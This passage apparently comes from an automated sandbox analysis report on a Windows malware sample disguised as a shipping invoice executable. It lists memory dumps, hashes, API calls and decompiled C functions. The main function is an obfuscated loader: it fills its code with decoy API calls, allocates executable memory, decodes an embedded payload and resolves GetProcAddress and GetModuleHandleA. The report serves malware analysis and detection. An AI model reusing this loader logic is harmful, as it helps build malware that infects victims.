                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent
                                                                                                                                    • API String ID: 3356406503-2399012098
                                                                                                                                    • Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                                                                                    • Instruction ID: e4f1e7439589972fcf118c5c53cdbc31cfa5ab0eeff8e2f1e96dc9b6b94aebae
                                                                                                                                    • Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                                                                                    • Instruction Fuzzy Hash: B5019A72540209AADF22CF60CC09FDB3BACEF04360F00802AF905A6191D278C924CBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405B45, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405B45(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                                    0x00405b46
                                                                                                                                    0x00405b50
                                                                                                                                    0x00405b52
                                                                                                                                    0x00405b59
                                                                                                                                    0x00405b61
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405b61
                                                                                                                                    0x00405b63
                                                                                                                                    0x00405b68

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405B4B
                                                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405B59
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                    • API String ID: 2709904686-224404859
                                                                                                                                    • Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                                                                                    • Instruction ID: aef4662ac69de026c31068fc7e73e23b4f893d7ca3339188f0f4dd73349a8212
                                                                                                                                    • Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
                                                                                                                                    • Instruction Fuzzy Hash: 2DD0C772819D706EE30366149D04F9F7AA8DF17701F090466E181A7191C67C6D4247FD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405C64, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405C64(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                    0x00405c74
                                                                                                                                    0x00405c76
                                                                                                                                    0x00405c79
                                                                                                                                    0x00405ca5
                                                                                                                                    0x00405c7e
                                                                                                                                    0x00405c87
                                                                                                                                    0x00405c8c
                                                                                                                                    0x00405c97
                                                                                                                                    0x00405c9a
                                                                                                                                    0x00405cb6
                                                                                                                                    0x00405c9c
                                                                                                                                    0x00405ca3
                                                                                                                                    0x00000000
                                                                                                                                    0x00405ca3
                                                                                                                                    0x00405caf
                                                                                                                                    0x00405cb3
                                                                                                                                    0x00405cb3
                                                                                                                                    0x00405cad
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C74
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C8C
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C9D
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                                                                                                    • Instruction ID: 4edc00b8cb5e942f0ed7daaa4efcd0f164f2627ad15681bfc3fbf6db0833b908
                                                                                                                                    • Opcode Fuzzy Hash: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                                                                                                    • Instruction Fuzzy Hash: D0F0C232105918BFDB02DFA4DD00D9EBBA8EF46254B2540BAE841F7211D638DE019B98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Analysis Process: rundll32.exe PID: 1748 Parent PID: 2792 rundll32.exeCOMMON

                                                                                                                                    Executed Functions

                                                                                                                                    Function 10001BB0, Relevance: 104.3, APIs: 32, Strings: 27, Instructions: 1026registrytimeCOMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E10001BB0() {
				signed int _v8;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v78;
				char _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v97;
				char _v102;
				char _v103;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v134;
				char _v136;
				char _v140;
				char _v144;
				char _v146;
				char _v148;
				char _v152;
				char _v156;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				char _v180;
				void* _v184;
				void* _v188;
				char _v192;
				void* _v196;
				char _v197;
				char _v198;
				char _v199;
				long _v200;
				char _v201;
				char _v203;
				char _v204;
				char _v208;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v236;
				void* _v240;
				void* _v244;
				void _v248;
				long _v252;
				long _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t195;
				void* _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				char _t201;
				int _t202;
				char* _t209;
				intOrPtr _t214;
				char _t215;
				intOrPtr _t223;
				intOrPtr _t224;
				char _t225;
				intOrPtr _t226;
				signed int _t238;
				char* _t247;
				intOrPtr _t252;
				char _t253;
				intOrPtr _t261;
				intOrPtr _t262;
				char _t263;
				intOrPtr _t264;
				void* _t275;
				short _t276;
				signed int _t277;
				signed short _t278;
				intOrPtr _t279;
				char _t280;
				intOrPtr _t281;
				short _t282;
				signed int _t283;
				intOrPtr _t286;
				intOrPtr _t287;
				_Unknown_base(*)()* _t288;
				void* _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				void* _t293;
				short _t294;
				signed short _t296;
				short _t297;
				short _t298;
				intOrPtr _t299;
				intOrPtr* _t300;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				void* _t307;
				intOrPtr _t308;
				intOrPtr _t309;
				signed int _t311;
				void* _t312;
				signed short _t316;
				signed short _t319;
				signed short _t323;
				signed int _t325;
				signed short _t330;
				signed short _t334;
				intOrPtr* _t341;
				short _t342;
				void* _t347;
				signed int _t361;
				signed int _t364;
				char _t365;
				char _t366;
				intOrPtr _t367;
				intOrPtr _t368;
				char _t376;
				char _t377;
				char _t381;
				intOrPtr _t383;
				char _t384;
				short _t392;
				char _t399;
				char _t400;
				char _t404;
				intOrPtr _t406;
				char _t407;
				void* _t415;
				signed int _t416;
				intOrPtr _t417;
				intOrPtr _t418;
				short _t419;
				signed int _t421;
				signed int _t423;
				signed int _t424;
				signed short _t426;
				void* _t427;
				char _t429;
				signed int _t430;
				intOrPtr _t431;
				intOrPtr _t432;
				intOrPtr _t433;
				void* _t434;
				char _t435;
				char _t436;
				void* _t437;
				intOrPtr _t438;
				char _t441;
				signed int _t442;
				signed short _t444;
				signed int _t446;
				void* _t447;
				intOrPtr _t448;
				signed short _t458;
				char _t459;
				signed short _t462;
				signed int _t464;
				void* _t466;
				intOrPtr _t467;
				intOrPtr _t468;
				intOrPtr _t478;
				char _t479;
				intOrPtr _t483;
				char _t484;
				char _t485;
				intOrPtr _t486;
				intOrPtr _t501;
				char _t502;
				intOrPtr _t506;
				long _t507;
				char _t508;
				intOrPtr _t509;
				void* _t517;
				signed int _t519;
				char _t520;
				signed int _t521;
				signed int _t522;
				intOrPtr _t523;
				void* _t524;
				void* _t528;
				signed int _t530;
				void* _t531;
				intOrPtr _t532;
				void* _t533;
				intOrPtr _t534;
				void* _t535;
				void* _t536;
				short _t538;
				struct HINSTANCE__* _t539;
				intOrPtr _t541;
				signed char _t543;
				signed short _t550;
				intOrPtr _t559;
				intOrPtr* _t563;
				short _t565;
				intOrPtr _t566;
				void* _t568;
				signed short _t569;
				signed int _t574;
				signed short _t575;
				intOrPtr _t576;
				intOrPtr _t577;
				intOrPtr _t578;
				void* _t583;
				intOrPtr _t584;
				signed int _t585;
				signed int _t586;
				signed short _t587;
				intOrPtr _t588;
				void* _t590;
				intOrPtr _t591;
				signed int _t597;
				intOrPtr _t598;
				short _t599;
				signed int _t600;
				signed short _t602;
				signed int _t603;
				signed int _t605;
				void* _t609;

				_t605 = (_t603 & 0xfffffff8) - 0x8c;
				_t195 =  *0x1000e420; // 0x44ea7bf2
				_v8 = _t195 ^ _t605;
				_t365 =  *0x1000e236;
				_t197 = 0x188;
				 *0x1000f0e8 = 0;
				_v103 = 0x61;
				_t466 = 0x1a5;
				if(_t365 > 0x188) {
					L3:
					_t198 =  *0x1000e364; // 0x47
					_t199 = _t198 ^  *0x1000e244;
					_v102 = 0x6c;
					_t609 =  *0x1000e2d4 - _t199; // 0x8f
					if(_t609 <= 0) {
						 *0x1000e189 = 0xb0;
					}
					_v97 = 0x63;
					if( *0x1000e328 != 0) {
						_t464 =  *0x1000e3c8; // 0x140
						if((_t464 ^ 0x000006bc) != 0) {
							 *0x1000ded8 = 0xa6;
						}
					}
					_t200 =  *0x1000dfd0 & 0x0000ffff;
					_t467 =  *0x1000e04c; // 0x161
					_t366 = 0x33;
					L9:
					if(_t366 == 0x910 || _t200 == 0x125) {
						_t200 = _t200 + 1;
						 *0x1000e294 = 0xc5;
						 *0x1000e2d8 = 9;
						_t366 = _t366 + _t467;
						goto L9;
					}
					_t468 =  *0x1000df30; // 0x20
					__eflags = _t468 !=  *0x1000e01c;
					if(_t468 !=  *0x1000e01c) {
						__eflags =  !( *0x1000e150) ^  *0x1000e39c;
						if(( !( *0x1000e150) ^  *0x1000e39c) != 0) {
							 *0x1000e2ed = 0xda;
						}
					}
					_t367 =  *0x1000df08;
					_t201 =  *0x1000def1;
					__eflags = _t367 - _t201;
					if(_t367 > _t201) {
						L18:
						_t368 =  *0x1000e240; // 0x6a
						__eflags = _t368 -  *0x1000e148; // 0x1d4
						if(__eflags < 0) {
							 *0x1000e05d = 0x45;
						}
						_t563 = __imp__#3; // 0x73eced70
						_t341 = __imp__CoRevokeClassObject;
						_t202 = 0x86;
						_v144 = 0x14a;
						_v140 = 0x86;
						_v136 = 0xc1;
						_v132 = 0x4be;
						while(1) {
							RegCreateKeyExW( &_v136, L"CloseFarmhouse32", _t202, L"_DrawPossible64", _t202,  &_v136,  &_v120,  &_v140,  &_v136);
							 *_t563( &_v144);
							 *_t341(_v148);
							__imp__CoFileTimeNow( &_v148);
							_t209 =  &_v156;
							__imp__CoInitializeSecurity( &_v152, _t209, _t209,  &_v148, _v156, _v148,  &_v152, _v152,  &_v156);
							CreatePrivateObjectSecurity( &_v184,  &_v192,  &_v192,  &_v184,  &_v192, _t210); // executed
							DisconnectNamedPipe( &_v184);
							_t376 = "SeemNicotinamide32"; // 0x6d656553
							_t478 = M1000A1F4; // 0x6f63694e
							_t214 = M1000A1F8; // 0x616e6974
							_v96 = _t376;
							_t377 = M1000A1FC; // 0x6564696d
							_v92 = _t478;
							_t479 =  *0x1000a200; // 0x3233
							_v84 = _t377;
							_v88 = _t214;
							_t215 =  *0x1000a202; // 0x0
							_v80 = _t479;
							_v78 = _t215;
							EnumResourceNamesA( &_v192,  &_v96,  &_v188,  &_v184); // executed
							EnumResourceTypesW( &_v196,  &_v196,  &_v188);
							LockFile( &_v192, _v192, _v200, _v200, _v200);
							_t381 = "StandMarmite"; // 0x6e617453
							_t483 = M1000A1E4; // 0x72614d64
							_t223 =  *0x1000a1e8; // 0x6574696d
							_v136 = _t381;
							_v132 = _t483;
							_t484 = "TakePenult32"; // 0x656b6154
							_v128 = _t223;
							_t224 = M1000A1D4; // 0x756e6550
							_v124 =  *0x1000a1ec & 0x000000ff;
							_t383 =  *0x1000a1d8; // 0x3233746c
							_v120 = _t484;
							_t485 =  *0x1000a1dc; // 0x0
							_v116 = _t224;
							_t225 = "EnumMicrophyte32"; // 0x6d756e45
							_v112 = _t383;
							_t384 = M1000A1C0; // 0x7263694d
							_v108 = _t485;
							_t486 = M1000A1C4; // 0x7968706f
							_v84 = _t225;
							_t226 =  *0x1000a1c8; // 0x32336574
							_v80 = _t384;
							_v76 = _t486;
							_v72 = _t226;
							_v68 =  *0x1000a1cc & 0x000000ff;
							LookupPrivilegeDisplayNameA( &_v136,  &_v120,  &_v84,  &_v196,  &_v200); // executed
							ReadEventLogW( &_v200, _v196, _v200,  &_v200, _v200,  &_v200,  &_v192);
							SetupComm( &_v200, _v200, _v192);
							WriteFile( &_v192,  &_v192, _v200,  &_v200,  &_v200);
							_t71 =  &_v188;
							 *_t71 = _v188 - 1;
							__eflags =  *_t71;
							if( *_t71 == 0) {
								break;
							}
							_t202 = _v196;
						}
						__eflags =  *0x1000e2d4 -  *0x1000e21c;
						_v144 = 0x65;
						_v146 = 0x72;
						if( *0x1000e2d4 <  *0x1000e21c) {
							 *0x1000e0e8 = 0x640;
						}
						_t238 =  *0x1000e020 & 0x0000ffff;
						_t392 =  *0x1000e148; // 0x1d4
						__eflags = _t238 - _t392;
						if(_t238 > _t392) {
							L28:
							_v188 = 0x4be;
							do {
								RegCreateKeyExW( &_v192, L"CloseFarmhouse32", _v196, L"_DrawPossible64", _v196,  &_v192,  &_v176,  &_v196,  &_v192);
								 *_t563( &_v200);
								 *_t341(_v204);
								__imp__CoFileTimeNow( &_v204);
								_t247 =  &_v212;
								__imp__CoInitializeSecurity( &_v208, _t247, _t247,  &_v204, _v212, _v204,  &_v208, _v208,  &_v212);
								CreatePrivateObjectSecurity( &_v240,  &_v248,  &_v248,  &_v240,  &_v248,  &_v248); // executed
								DisconnectNamedPipe( &_v240);
								_t399 = "SeemNicotinamide32"; // 0x6d656553
								_t501 = M1000A1F4; // 0x6f63694e
								_t252 = M1000A1F8; // 0x616e6974
								_v152 = _t399;
								_t400 = M1000A1FC; // 0x6564696d
								_v148 = _t501;
								_t502 =  *0x1000a200; // 0x3233
								_v140 = _t400;
								_v144 = _t252;
								_t253 =  *0x1000a202; // 0x0
								_v136 = _t502;
								_v134 = _t253;
								EnumResourceNamesA( &_v248,  &_v152,  &_v244,  &_v240);
								EnumResourceTypesW( &_v252,  &_v252,  &_v244);
								LockFile( &_v248, _v248, _v256, _v256, _v256);
								_t404 = "StandMarmite"; // 0x6e617453
								_t506 = M1000A1E4; // 0x72614d64
								_t261 =  *0x1000a1e8; // 0x6574696d
								_v176 = _t404;
								_v172 = _t506;
								_t507 = "TakePenult32"; // 0x656b6154
								_v168 = _t261;
								_t262 = M1000A1D4; // 0x756e6550
								_v164 =  *0x1000a1ec & 0x000000ff;
								_t406 =  *0x1000a1d8; // 0x3233746c
								_v192 = _t507;
								_t508 =  *0x1000a1dc; // 0x0
								_v188 = _t262;
								_t263 = "EnumMicrophyte32"; // 0x6d756e45
								_v184 = _t406;
								_t407 = M1000A1C0; // 0x7263694d
								_v180 = _t508;
								_t509 = M1000A1C4; // 0x7968706f
								_v140 = _t263;
								_t264 =  *0x1000a1c8; // 0x32336574
								_v136 = _t407;
								_v132 = _t509;
								_v128 = _t264;
								_v124 =  *0x1000a1cc & 0x000000ff;
								LookupPrivilegeDisplayNameA( &_v176,  &_v192,  &_v140,  &_v252,  &_v256); // executed
								ReadEventLogW( &_v256, _v252, _v256,  &_v256, _v256,  &_v256,  &_v248);
								SetupComm( &_v256, _v256, _v248);
								WriteFile( &_v248,  &_v248, _v256,  &_v256,  &_v256);
								_t137 =  &_v244;
								 *_t137 = _v244 - 1;
								__eflags =  *_t137;
							} while ( *_t137 != 0);
							_t342 =  *0x1000e03c; // 0x9b
							_t415 = 0xbf;
							_t517 = 0x9d;
							_t275 = 0xa3;
							while(1) {
								__eflags = _t275 - 0xdb;
								if(_t275 >= 0xdb) {
									goto L34;
								}
								__eflags = _t517 - _t342;
								if(_t517 != _t342) {
									L35:
									_t416 =  *0x1000e084 & 0x0000ffff;
									_t276 =  *0x1000e148;
									_t519 =  *0x1000e2f4 & 0x0000ffff;
									__eflags = _t416 - _t519;
									_t583 = 0x81;
									if(_t416 != _t519) {
										L40:
										_t277 =  *0x1000df00 & 0x0000ffff;
										__eflags = _t277 - 0x67;
										_t417 =  *0x1000dee0; // 0xe6c
										_t565 =  *0x1000e14e; // 0x27
										_v208 = 0;
										_v213 = 0x41;
										if(_t277 != 0x67) {
											L45:
											_t418 =  *0x1000e0d8; // 0x1ef
											__eflags = _t418 -  *0x1000e040; // 0x16e
											_v218 = 0x72;
											_v212 = 0x6c;
											if(__eflags <= 0) {
												 *0x1000def1 = 0x77;
											}
											_t278 =  *0x1000e114; // 0x99
											__eflags = _t278 - 0x14a;
											if(_t278 > 0x14a) {
												L53:
												_t279 =  *0x1000e30c; // 0x10c
												_t584 =  *0x1000df48; // 0x140
												__eflags = _t279 - _t584;
												_t520 =  *0x1000e054; // 0x1e6
												_t419 =  *0x1000e080;
												if(_t279 > _t584) {
													L58:
													_t280 =  *0x1000de8a;
													__eflags = _t280 - 0x1d1;
													if(_t280 > 0x1d1) {
														L61:
														__eflags =  *0x1000e184;
														_v198 = 0x33;
														_v204 = 0x6b;
														if( *0x1000e184 != 0) {
															__eflags =  *0x1000e130;
															if( *0x1000e130 != 0) {
																 *0x1000e07e = 0xc8;
															}
														}
														_t521 =  *0x1000e34c; // 0x1bf
														_t522 = _t521 ^  *0x1000e368;
														_v196 = 0;
														__eflags = _t522;
														if(_t522 != 0) {
															L66:
															 *0x1000e134 = 0x8a;
															goto L67;
														} else {
															__eflags =  *0x1000e2d4 - _t522; // 0x8f
															if(__eflags == 0) {
																L67:
																_t281 =  *0x1000dfcc; // 0x29
																_t523 =  *0x1000e270; // 0x170
																__eflags = _t281 - _t523;
																_v220 = 0x56;
																_v217 = 0x74;
																_v211 = 0x6c;
																_v203 = 0x65;
																_t421 =  *0x1000e234 & 0x0000ffff;
																if(_t281 != _t523) {
																	L71:
																	_t423 =  *0x1000e2ca & 0x0000ffff;
																	_t282 = _t565;
																	__eflags = _t282 - _t423;
																	_v236 = 0x1000c000;
																	_v199 = 0x6c;
																	_v201 = 0x6e;
																	_v197 = 0x32;
																	_v210 = 0x6f;
																	_v244 = _t282;
																	_t524 = 0xaa;
																	if(_t282 != _t423) {
																		L78:
																		_t424 =  *0x1000e144; // 0x83
																		__eflags = (_t424 ^ 0x00000043) -  *0x1000dfdc; // 0x115
																		_v216 = 0x75;
																		_v219 = 0x69;
																		if(__eflags >= 0) {
																			 *0x1000e394 = 0x5d;
																		}
																		_t426 =  *0x1000df0c; // 0x63
																		_t283 =  *0x1000e154 & 0x0000ffff;
																		__eflags = _t283 - _t426;
																		if(_t283 < _t426) {
																			L83:
																			_v240 = GetModuleHandleA( &_v204);
																			_t286 =  *0x1000e06e; // 0xbe
																			__eflags = _t286 - 0xda;
																			_v244 = _t286;
																			if(_t286 < 0xda) {
																				L86:
																				_t585 =  *0x1000df0c & 0x0000ffff;
																				_t566 =  *0x1000e3ec; // 0x96
																				_t287 =  *0x1000e210; // 0xc9
																				_t528 = 0x1f2;
																				_t427 = 0x7f;
																				while(1) {
																					__eflags = _t528 - 0xffd2;
																					if(_t528 >= 0xffd2) {
																						goto L90;
																					}
																					__eflags = _t585 -  *0x1000e2ce;
																					if(_t585 >  *0x1000e2ce) {
																						L91:
																						_t288 = GetProcAddress(_v240,  &_v220);
																						_t429 =  *0x1000e399;
																						_t586 =  *0x1000e040 & 0x0000ffff;
																						_t530 =  *0x1000e3c4 & 0x0000ffff;
																						_t289 = 0x116;
																						__eflags = _t429 - 0x116;
																						_v244 = _t288;
																						if(_t429 < 0x116) {
																							L96:
																							_t290 = VirtualAlloc(0, 0x1c, 0x3000, 0x40); // executed
																							 *0x1000f0d0 = _t290;
																							_t291 =  *0x1000e114 & 0x0000ffff;
																							_t430 = _t291;
																							__eflags = _t430 - 0x50;
																							_v240 = _t291;
																							_t531 = 0x166;
																							if(_t430 < 0x50) {
																								L103:
																								_t431 =  *0x1000e350; // 0x13a
																								_t532 =  *0x1000dfb0; // 0x118
																								__eflags = _t431 - _t532;
																								if(_t431 < _t532) {
																									L106:
																									_t432 =  *0x1000e1a0; // 0x11e
																									__eflags = _t432 -  *0x1000e324; // 0x1f2
																									_t533 =  *0x1000f0d0; // 0x7c0000
																									if(__eflags >= 0) {
																										 *0x1000e1c0 = 0x8a;
																									}
																									 *((intOrPtr*)(_t533 + 4)) = 0x331;
																									 *((intOrPtr*)(_t533 + 8)) = 0x9e3;
																									_t292 =  *0x1000e264 & 0x0000ffff;
																									__eflags = _t292 - 0x150;
																									_t433 =  *0x1000e1f8; // 0x1d8
																									if(_t292 != 0x150) {
																										L112:
																										 *((intOrPtr*)(_t533 + 0xc)) = 0x9000;
																										_t534 =  *0x1000e134; // 0x8a
																										_t293 = 0x76;
																										__eflags = _t534 - 0x76;
																										_t434 = 0x76;
																										if(_t534 > 0x76) {
																											L118:
																											_t294 =  *0x1000e1ac;
																											__eflags = _t294 - 0x1b;
																											_t435 = 0x65;
																											if(_t294 > 0x1b) {
																												L122:
																												_t535 =  *0x1000f0d0; // 0x7c0000
																												 *_t535 = "Erodium"; // executed
																												_v244 = VirtualAlloc(0, 0x1e3c, 0x3000, 0x40);
																												_t296 =  *0x1000e26c; // 0x10e
																												__eflags = _t296 -  *0x1000e144; // 0x83
																												if(__eflags < 0) {
																													_t436 =  *0x1000dfc4; // 0xe27
																												} else {
																													_t436 = 0x8c;
																													 *0x1000dfc4 = 0x8c;
																												}
																												_t297 =  *0x1000e184;
																												__eflags = _t297 - 0xa;
																												if(_t297 != 0xa) {
																													L128:
																													_t298 =  *0x1000e03c;
																													__eflags = _t298 - 0xad;
																													_t587 =  *0x1000e208; // 0x3b
																													_v240 = 0;
																													_t437 = 0x11;
																													_t536 = 0x68;
																													if(_t298 != 0xad) {
																														L133:
																														_t299 =  *0x1000de8c;
																														_t588 =  *0x1000e1a0; // 0x11e
																														 *0x1000f0e0 =  &_v236;
																														_t538 =  *0x1000e078;
																														__eflags = _t299 - _t538;
																														_t438 = 0xc4;
																														if(_t299 > _t538) {
																															L138:
																															_t539 = _v240;
																															do {
																																_t300 =  *0x1000f0e0; // 0x30f8e8
																																_t301 =  *0x1000f0e8; // 0x78f
																																 *0x1000f0e8 = _t301 + 1;
																																_t303 =  *0x1000e26c & 0x0000ffff;
																																_t441 =  *((intOrPtr*)( *_t300 + _t301 * 4)) - 0x45907;
																																__eflags = _t303 - 0xbb;
																																if(_t303 != 0xbb) {
																																	goto L142;
																																}
																																do {
																																	_t303 = _t303 + 1;
																																	__eflags = _t303 - 0xbb;
																																	 *0x1000e388 = 0x42;
																																	 *0x1000e134 = 0xd9;
																																	 *0x1000e106 = 0xda;
																																	 *0x1000e2fc = 0x440;
																																} while (_t303 == 0xbb);
																																L142:
																																 *((char*)(_t539 + _v244)) = _t441;
																																_t539 =  &(_t539->i);
																																__eflags = _t539 - 0x78f;
																															} while (_t539 < 0x78f);
																															_t442 =  *0x1000debc; // 0x1e7
																															__eflags = (_t442 ^ 0x000000c0) -  *0x1000e114; // 0x99
																															if(__eflags <= 0) {
																																 *0x1000ded4 = 0x2c;
																															}
																															_t305 =  *0x1000e188 & 0x0000ffff;
																															__eflags = _t305 - 0x859;
																															if(_t305 != 0x859) {
																																L148:
																																_t306 =  *0x1000e208 & 0x0000ffff;
																																_v244 = _v244 + 0xb2;
																																__eflags = _t306 - 0x1f2;
																																_t444 =  *0x1000e040; // 0x16e
																																_t541 = 9;
																																if(_t306 > 0x1f2) {
																																	L153:
																																	_t307 =  *0x1000f0d0; // 0x7c0000
																																	 *((intOrPtr*)(_t307 + 0x14)) = GetProcAddress;
																																	_t308 =  *0x1000df08; // 0x9f
																																	__eflags = _t308 - 0xbb;
																																	if(_t308 > 0xbb) {
																																		L156:
																																		_t309 =  *0x1000e350; // 0x13a
																																		__eflags = _t309 - 0xc6;
																																		_t446 =  *0x1000e100 & 0x0000ffff;
																																		 *0x1000f0dc = _v244;
																																		if(_t309 > 0xc6) {
																																			L160:
																																			_t311 =  *0x1000ded4 & 0x0000ffff;
																																			__eflags = _t311 - 0x136;
																																			if(_t311 < 0x136) {
																																				L163:
																																				_t447 =  *0x1000f0d0; // 0x7c0000
																																				_t543 = GetModuleHandleA;
																																				 *(_t447 + 0x18) = GetModuleHandleA;
																																				_t448 =  *0x1000e350; // 0x13a
																																				_t312 = 0xffffffc9;
																																				__eflags =  *0x1000df00 - _t312; // 0x129
																																				if(__eflags != 0) {
																																					L169:
																																					_pop(_t568);
																																					_pop(_t590);
																																					_pop(_t347);
																																					__eflags = _v120 ^ _t605;
																																					return E10002ECD(0xb2, _t347, _v120 ^ _t605, _t543, _t568, _t590);
																																				}
																																				_t591 =  *0x1000dfcc; // 0x29
																																				_t569 =  *0x1000e020; // 0x19c
																																				_t543 =  *0x1000e10f; // -76
																																				while(1) {
																																					__eflags = _t448 -  *0x1000df94; // 0x88
